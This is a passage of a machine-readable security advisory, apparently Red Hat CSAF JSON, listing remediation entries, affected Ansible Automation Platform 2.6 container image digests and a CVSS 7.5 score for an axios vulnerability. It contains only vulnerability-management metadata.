"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-01T18:20:27+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6404"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5ae8f465d29dd195934b13da6854989ba69508d9b1a42d8afcb2c7fe64d65090_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:7c19bf21321a59e06b664f8b3300ba92492b025428c0a2afd8aaf1074e91778d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:be93e95a735d5193c3f459fd0e4b59d6a4972b1886e214951dc80e697ab41505_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:c8425cc65b52b3b3538036873f74e4fd9dbeec54254f95f94108003421f45b4e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
